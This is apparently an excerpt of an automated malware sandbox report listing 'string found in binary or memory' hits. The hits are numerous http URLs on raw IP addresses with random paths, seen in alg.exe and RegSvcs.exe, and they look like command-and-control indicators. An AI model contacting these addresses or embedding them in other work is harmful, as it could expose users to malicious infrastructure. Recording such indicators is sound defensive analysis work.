              Source: alg.exe, 0000000D.00000003.1575202487.000000000050A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/xfhngbevi2$d
              Source: alg.exe, 0000000D.00000003.1917967381.000000000050A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1932808513.000000000050A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107:80/eyajoanbw
              Source: alg.exe, 0000000D.00000003.1508234940.000000000050A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107:80/krqescexcxjlmqje
              Source: alg.exe, 0000000D.00000003.1790797442.000000000050A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1575202487.000000000050A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107:80/xfhngbevi
              Source: alg.exe, 0000000D.00000003.2153120949.0000000000529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.246.231.120/kfeqymn
              Source: alg.exe, 0000000D.00000003.2210269453.000000000053A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.246.231.120/opP
              Source: alg.exe, 0000000D.00000003.2259482527.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2276640960.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2267339346.000000000053A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.246.231.120/shrlpi
              Source: alg.exe, 0000000D.00000003.2257351195.0000000000529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.246.231.120/shrlpiinieee
              Source: alg.exe, 0000000D.00000003.2179969488.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2257351195.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2227343739.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2276640960.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2210269453.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2266240425.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2197748874.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2106093399.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2080646306.000000000050F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2161214560.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2288608476.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2245066266.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2143416467.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2116238505.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2088717654.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2078285049.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2153120949.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2124390441.0000000000529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.246.231.120/wpnrqhmpnuisgi
              Source: alg.exe, 0000000D.00000003.2068786844.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.117.43.225/
              Source: alg.exe, 0000000D.00000003.2016629204.0000000000557000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2046169214.0000000000557000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2007443563.0000000000557000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2026221908.0000000000557000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2041235754.0000000000557000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2032480249.0000000000557000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2078285049.0000000000557000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2062612258.0000000000557000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1983866160.0000000000557000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2000758926.0000000000557000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2067214816.0000000000557000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1999368202.0000000000557000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2056093276.0000000000557000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.117.43.225/ayiycmrfnan
              Source: alg.exe, 0000000D.00000003.2025611759.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2007443563.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1999368202.000000000052A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1983866160.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2016629204.0000000000529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.117.43.225/ayiycmrfnan-
              Source: alg.exe, 0000000D.00000003.2067214816.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2062612258.000000000052A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2065019404.000000000050F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2106093399.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2116238505.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2088717654.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2078285049.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2124390441.0000000000529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.117.43.225/cuxawpwbnkhn
              Source: alg.exe, 0000000D.00000003.2062612258.000000000052A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.117.43.225/cuxawpwbnkhnM
              Source: alg.exe, 0000000D.00000003.2179969488.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2067214816.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2257351195.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2062612258.000000000052A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2227343739.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2276640960.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2210269453.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2266240425.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2197748874.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2106093399.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2161214560.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2288608476.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2245066266.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2143416467.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2116238505.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2088717654.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2078285049.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2153120949.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2124390441.0000000000529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.117.43.225/cuxawpwbnkhnU
              Source: alg.exe, 0000000D.00000003.2065019404.000000000050F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.117.43.225/cuxawpwbnkhns#$u
              Source: alg.exe, 0000000D.00000003.2069852108.000000000050F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.117.43.225/jttp
              Source: alg.exe, 0000000D.00000003.2089955706.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2067214816.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2079601241.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2125759526.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2106093399.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2116238505.000000000053A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.117.43.225/jttpg
              Source: alg.exe, 0000000D.00000003.1983866160.0000000000539000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2007443563.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2000758926.0000000000539000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2007952814.0000000000538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.117.43.225/kqipv(
              Source: alg.exe, 0000000D.00000003.2276640960.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2266240425.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2288608476.0000000000529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.94.10.34/mgwvuleuoxgka
              Source: alg.exe, 0000000D.00000003.2288608476.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2276640960.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2267339346.000000000053A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.94.10.34/mgwvuleuoxgkaL
              Source: alg.exe, 0000000D.00000003.2276640960.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2266240425.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2288608476.0000000000529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.94.10.34/mgwvuleuoxgkarue
              Source: alg.exe, 0000000D.00000003.2040810220.0000000000509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.94.10.34:80/if8
              Source: alg.exe, 0000000D.00000003.1972777177.0000000000539000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.227.7.138/ljnlowtt
              Source: alg.exe, 0000000D.00000003.2040810220.0000000000509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.227.7.138:80/ljnlowt
              Source: alg.exe, 0000000D.00000003.1966658212.0000000000557000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1983866160.0000000000557000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1973326884.0000000000557000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2000758926.0000000000557000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1999368202.0000000000557000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.246.200.160/rrvggovttpevpbe
              Source: alg.exe, 0000000D.00000003.2025611759.0000000000529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://35.164.78.200/xtqnbvhp
              Source: alg.exe, 0000000D.00000003.2025611759.0000000000539000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2032480249.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2032923896.0000000000538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://35.164.78.200/xtqnbvhpX
              Source: alg.exe, 0000000D.00000003.2125759526.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2143416467.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2144486551.0000000000539000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/edke
              Source: alg.exe, 0000000D.00000003.2067214816.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2062612258.000000000052A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2025611759.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2032480249.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2007443563.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2040378345.000000000052A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2046169214.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2016629204.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2056093276.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2078285049.0000000000529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/kkcqqeuyeyu
              Source: alg.exe, 0000000D.00000003.2016629204.0000000000557000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2046169214.0000000000557000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2007443563.0000000000557000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2026221908.0000000000557000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2041235754.0000000000557000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2032480249.0000000000557000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2062612258.0000000000557000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2056093276.0000000000557000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/kkcqqeuyeyuuhTf
              Source: alg.exe, 0000000D.00000003.1914053502.000000000050A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1914915915.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1917871727.000000000052C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/yxchsqwoy
              Source: alg.exe, 0000000D.00000003.1529626183.000000000050A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105:80/exyejkfqnn:
              Source: alg.exe, 0000000D.00000003.1917967381.000000000050A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1914053502.000000000050A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105:80/yxchsqwoyP
              Source: alg.exe, 0000000D.00000003.1893684140.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1892475238.000000000052C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/
              Source: alg.exe, 0000000D.00000003.2227343739.0000000000529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/aywxxumeinieee
              Source: alg.exe, 0000000D.00000003.2257351195.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2227343739.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2276640960.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2266240425.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2288608476.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2245066266.0000000000529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/aywxxumeinieee-
              Source: alg.exe, 0000000D.00000003.2257351195.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2227343739.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2266240425.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2245066266.0000000000529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/aywxxumeinieeeJ
              Source: alg.exe, 0000000D.00000003.1892475238.000000000052C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/dnmpvtql
              Source: alg.exe, 0000000D.00000003.1892690377.000000000050A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212:80/dnmpvtql
              Source: alg.exe, 0000000D.00000003.1492313549.00000000004ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/
              Source: alg.exe, 0000000D.00000003.1492313549.00000000004ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/T
              Source: alg.exe, 0000000D.00000003.1489265743.000000000050C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1493620638.0000000000509000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1492313549.00000000004ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/iqhmiklhuwbcg
              Source: alg.exe, 0000000D.00000003.2179969488.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2067214816.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2257351195.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2062612258.000000000052A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2227343739.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2276640960.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2210269453.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2266240425.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2197748874.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2106093399.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2161214560.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2288608476.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2245066266.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2143416467.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2116238505.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2088717654.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2056093276.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2078285049.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2153120949.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2124390441.0000000000529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/jqlotfcyykbfgsp
              Source: alg.exe, 0000000D.00000003.1492313549.00000000004ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/p
              Source: alg.exe, 0000000D.00000003.1492313549.00000000004ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/t
              Source: alg.exe, 0000000D.00000003.2017070889.0000000000538000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2016629204.0000000000529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/vipn(
              Source: alg.exe, 0000000D.00000003.2090939732.000000000050F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2108245828.000000000050F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/xhfpy
              Source: alg.exe, 0000000D.00000003.2090939732.000000000050F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2108245828.000000000050F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/xhfpybfgsp7$a
              Source: alg.exe, 0000000D.00000003.2089955706.000000000053A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/xhfpyt
              Source: alg.exe, 0000000D.00000003.1521291058.000000000050A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177:80/fmwgjknn:
              Source: alg.exe, 0000000D.00000003.1955254799.0000000000509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://72.52.178.23/xrkixnpk
              Source: alg.exe, 0000000D.00000003.1999368202.000000000052A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1957228645.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1972777177.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1955019744.000000000052C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1983866160.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1966658212.0000000000529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://72.52.178.23/xrkixnpkc
              Source: alg.exe, 0000000D.00000003.1957228645.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1955019744.000000000052C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1966658212.0000000000529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://72.52.178.23/xrkixnpkexe
              Source: alg.exe, 0000000D.00000003.2007443563.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1999368202.000000000052A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1957228645.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1972777177.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1955019744.000000000052C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1983866160.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1966658212.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2016629204.0000000000529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://72.52.178.23/xrkixnpkqlbauh
              Source: alg.exe, 0000000D.00000003.1966658212.0000000000539000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1957228645.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1957847112.0000000000538000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1955019744.000000000052C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://72.52.178.23/xrkixnpkt
Source: alg.exe, 0000000D.00000003.2046169214.0000000000539000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2181291982.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2089955706.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2067214816.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2079601241.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2200527185.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2125759526.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1966658212.0000000000539000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2163395398.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2025611759.0000000000539000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2062612258.000000000052A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2106093399.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2229080820.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1983866160.0000000000539000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1972777177.0000000000539000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2032480249.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2040378345.0000000000539000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2007443563.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2246556685.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1944474303.000000000052C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1957228645.0000000000529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://72.52.178.23/yhikx
              Source: alg.exe, 0000000D.00000003.1790797442.000000000050A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1575202487.000000000050A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1553956256.000000000050A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1798107286.000000000050A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://72.52.178.23:80/enP
              Source: alg.exe, 0000000D.00000003.1543980844.0000000000509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://72.52.178.23:80/gedtsq
              Source: alg.exe, 0000000D.00000003.1955254799.0000000000509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://72.52.178.23:80/xrkixnpk
              Source: alg.exe, 0000000D.00000003.1955254799.0000000000509000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1944621326.000000000050A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://72.52.178.23:80/yhikx
              Source: alg.exe, 0000000D.00000003.1790797442.000000000050A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1790563475.000000000052C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1790699822.000000000053A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/aopfhnckuovs
              Source: RegSvcs.exe, 00000008.00000002.1601150507.0000000001223000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/c
              Source: alg.exe, 0000000D.00000003.1838038969.000000000050A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/fkj
              Source: alg.exe, 0000000D.00000003.1838038969.000000000050A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/fkjgs
              Source: alg.exe, 0000000D.00000003.1878733120.000000000050A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/mtrjsdrytjxvslm
              Source: alg.exe, 0000000D.00000003.1878733120.000000000050A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/mtrjsdrytjxvslm#$u
              Source: alg.exe, 0000000D.00000003.1798107286.0000000000521000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1838038969.0000000000521000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1798107286.000000000050A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/reeuv
              Source: alg.exe, 0000000D.00000003.1798107286.000000000050A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/reeuv#$u
              Source: RegSvcs.exe, 00000008.00000002.1601150507.000000000120D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1601150507.0000000001223000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/wt
              Source: alg.exe, 0000000D.00000003.1790797442.000000000050A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1798107286.000000000050A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/aopfhnckuovs
              Source: alg.exe, 0000000D.00000003.1838038969.000000000050A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/fkjv
              Source: alg.exe, 0000000D.00000003.1914053502.000000000050A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1892690377.000000000050A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1878733120.000000000050A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1907846105.000000000050A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/mtrjsdrytjxvslmP
